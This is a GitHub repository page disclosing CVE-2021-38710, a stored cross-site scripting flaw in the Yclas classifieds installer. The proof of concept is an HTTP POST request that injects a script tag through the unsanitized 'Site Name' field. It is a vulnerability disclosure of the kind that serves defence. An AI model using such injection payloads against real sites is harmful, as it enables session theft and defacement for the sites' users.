Skip to content

security-n/CVE-2021-38710

main
Switch branches/tags

Name already in use

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
Code

Latest commit

 

Git stats

Files

Permalink
Failed to load latest commit information.
Type
Name
Latest commit message
Commit time
 
 

yclas-xss1

STATIC XSS (PERSISTENT XSS)

https://github.com/yclas/yclas

Install/View/Form.php accepts javascript in the "Site Name" field and does not sanitize input, saving the information in the database.

POST / HTTP/1.1 Host: 0.0.0.0:8081 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 Accept: application/json, ext/javascript, /; q=0.01 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 338 Origin: http://0.0.0.0:8081 Connection: close Referer: http://0.0.0.0:8081/ Cookie: PHPSESSID=; theme=87a24f00f25f75f91eeacce8f9f24ae285233db5~atlantic-lite; session= LANGUAGE=en_US&DB_HOST=localhost&DB_NAME=openclassifieds1&DB_USER=root&DB_PASS=kali&SAMPLE_DB=on&DB_CHARSET=utf8mb4&TABLE_PREFIX=yc4_&SITE_URL=http%3A%2F%2F0.0.0.0%3A8081%2F&SITE_FOLDER=%2F&SITE_NAME=<script>alert(1)</script>&TIMEZONE=America%2FLos_Angeles&ADMIN_EMAIL=testemail@test.com&ADMIN_PWD=test1234&HASH_KEY=

SCREENSHOTS AVAILABLE IN THE REPO FILES

DISCOVERED BY NATHAN JOHNSON ON 8/15/2021

About

No description, website, or topics provided.

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published